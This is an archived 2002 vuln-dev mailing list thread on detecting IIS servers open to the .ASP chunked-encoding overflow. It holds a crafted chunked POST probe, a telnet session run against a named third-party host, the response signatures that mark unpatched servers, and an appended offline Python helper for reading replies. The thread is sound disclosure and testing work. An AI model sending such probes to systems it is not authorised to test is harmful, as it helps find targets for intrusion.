Vulnerability Development mailing list archives

Re: Re[2]: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]


From: "Riley Hassell" <rhassell () eeye com>
Date: Sat, 13 Apr 2002 08:27:03 -0700

It looks like it's failing with a 404 and defaulting to an error page. Run
your tests on a machine that has the default iisstart.asp file. The one
you're testing doesn't appear to.

telnet www.security.nnov.ru 80
----session---
POST /iisstart.asp HTTP/1.1
Accept: */*
Host: www.security.nnov.ru
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

1
E
0


HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Sat, 13 Apr 2002 15:27:49 GMT

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Sat, 13 Apr 2002 15:27:49 GMT
Connection: close
Content-Type: text/html
Content-Length: 1737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<script language="JavaScript">
if(top.frames[0]!=null){
        top.location.replace("/index.asp");
}
else top.location.replace(".");
</script>
<!--
<head>
        <title>?°?ß?? 404</title><link rel="STYLESHEET" type="text/cs
/style/normal.css">
....
----- Original Message -----
From: "3APA3A" <3APA3A () SECURITY NNOV RU>
To: "Riley Hassell" <rhassell () eeye com>
Cc: <vuln-dev () securityfocus com>
Sent: Saturday, April 13, 2002 1:28 AM
Subject: Re[2]: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]


Dear Riley Hassell,


--Saturday, April 13, 2002, 2:15:47 AM, you wrote to vuln-dev () securityfocus com:



RH>   "POST /iisstart.asp HTTP/1.1\r\n"
RH>   "Accept: */*\r\n"
RH>   "Host: eeye.com\r\n"
RH>   "Content-Type: application/x-www-form-urlencoded\r\n"
RH>   "Transfer-Encoding: chunked\r\n"
RH>   "\r\n"
RH>   "1\r\n"
RH>   "E\r\n"
RH>   "0\r\n"
RH>   "\r\n"
RH>   "\r\n"
RH>   "\r\n"

In my case it produces no error and simply responds with page content
after

   "\r\n"
   "1\r\n"
   "E\r\n"
   "0\r\n"
   "\r\n"


RH> It won't overwrite anything mission critical so the dllhost shouldn't lock
RH> up or exit. If you're vulnerable then you'll see the following string in the
RH> error message "(0x80004005)<br>Unspecified". When a server is patched it
RH> will respond with a new error, I believe it's (0x80004005)<br>Request...

RH> You can also try putting NULL's in strange places in your request. The
RH> rollup fixes a problem in parsing requests with NULLs. When IIS sees
RH> something invalid in a request it will error back with "parameter
RH> incorrect", on an unpatched system the responses will vary.



--
~/ZARAZA
...never did he take up programming without a cudgel. (Lem)
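The exchange above turns on two reading details: the body "1 / E / 0" is simply the chunked encoding of the single byte "E", and IIS answers a chunked POST with an interim "100 Continue" before the real reply, so a 404 (no /iisstart.asp on the host) has to be told apart from the two "(0x80004005)" error strings the thread names. The following Python is an added example, not code from either poster; it works offline on constructed sample replies (the 404 one is abridged from the session quoted above, the other two are made up around the error strings named in the thread), and it does no network I/O. Function names and the classification labels are this example's own.

```python
"""Offline helpers for reading the IIS chunked-encoding test exchange
quoted in this thread.  Added example, not code from the original posts."""

import re

# Error strings the thread names: unpatched servers answer with
# "(0x80004005)<br>Unspecified", patched ones with "(0x80004005)<br>Request...".
UNPATCHED_SIG = b"(0x80004005)<br>Unspecified"
PATCHED_SIG = b"(0x80004005)<br>Request"


def chunked_body(data: bytes, chunk_size: int = 1) -> bytes:
    """Encode `data` with HTTP/1.1 chunked transfer-encoding.

    Each chunk is '<hex size>\\r\\n<bytes>\\r\\n'; the body ends with the
    zero-size chunk '0\\r\\n' and an empty trailer line '\\r\\n'.  For b'E'
    this is exactly the body used in the thread: b'1\\r\\nE\\r\\n0\\r\\n\\r\\n'.
    """
    out = bytearray()
    for i in range(0, len(data), chunk_size):
        piece = data[i:i + chunk_size]
        out += b"%x\r\n" % len(piece) + piece + b"\r\n"
    out += b"0\r\n\r\n"
    return bytes(out)


def split_responses(raw: bytes):
    """Yield (status, headers, body) for every HTTP response in `raw`.

    IIS sends an interim '100 Continue' before the real reply (see the
    session in the mail), so stopping at the first status line never shows
    the 404 or the ASP error page.  1xx replies carry no body; the final
    reply is delimited by Content-Length when present, else runs to the end.
    """
    pos = 0
    while pos < len(raw):
        end = raw.find(b"\r\n\r\n", pos)
        if end < 0:
            return
        lines = raw[pos:end].decode("latin-1").split("\r\n")
        m = re.match(r"HTTP/1\.[01] (\d{3})", lines[0])
        if not m:
            return
        status = int(m.group(1))
        headers = {}
        for line in lines[1:]:
            if ":" in line:
                k, v = line.split(":", 1)
                headers[k.strip().lower()] = v.strip()
        pos = end + 4
        if 100 <= status < 200:
            yield status, headers, b""
            continue
        if "content-length" in headers:
            length = int(headers["content-length"])
            body = raw[pos:pos + length]
            pos += length
        else:
            body = raw[pos:]
            pos = len(raw)
        yield status, headers, body


def classify_response(raw: bytes) -> str:
    """Classify a captured reply using only the criteria stated in the thread.

    A 404 means the request never reached ASP (no /iisstart.asp on that
    host), so it says nothing about the patch level; that is the point of
    the reply above.  Labels are this example's own.
    """
    final = None
    for item in split_responses(raw):
        final = item
    if final is None:
        return "unparseable"
    status, _headers, body = final
    if status == 404:
        return "inconclusive-404-no-iisstart.asp"
    if UNPATCHED_SIG in body:
        return "unpatched-signature"
    if PATCHED_SIG in body:
        return "patched-signature"
    return f"unknown-{status}"


# Constructed sample replies (abridged / made up as described in the lead-in).
SAMPLE_404 = (
    b"HTTP/1.1 100 Continue\r\nServer: Microsoft-IIS/5.0\r\n\r\n"
    b"HTTP/1.1 404 Object Not Found\r\nServer: Microsoft-IIS/5.0\r\n"
    b"Content-Type: text/html\r\nContent-Length: 23\r\n\r\n"
    b"<html>not found</html>\n"
)
SAMPLE_UNPATCHED = (
    b"HTTP/1.1 100 Continue\r\n\r\n"
    b"HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html\r\n\r\n"
    b"<html>error '(0x80004005)<br>Unspecified error</html>"
)
SAMPLE_PATCHED = (
    b"HTTP/1.1 100 Continue\r\n\r\n"
    b"HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html\r\n\r\n"
    b"<html>error '(0x80004005)<br>Request error</html>"
)

if __name__ == "__main__":
    print(chunked_body(b"E"))
    for name, sample in (("404", SAMPLE_404), ("unpatched", SAMPLE_UNPATCHED),
                         ("patched", SAMPLE_PATCHED)):
        print(name, "->", classify_response(sample))
```

Running the script prints the chunked body and the three classifications; an administrator checking a capture of their own server's reply would feed the raw bytes to `classify_response` and treat anything but the two named signatures as "test did not apply", which is what the 404 in the session above amounts to.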



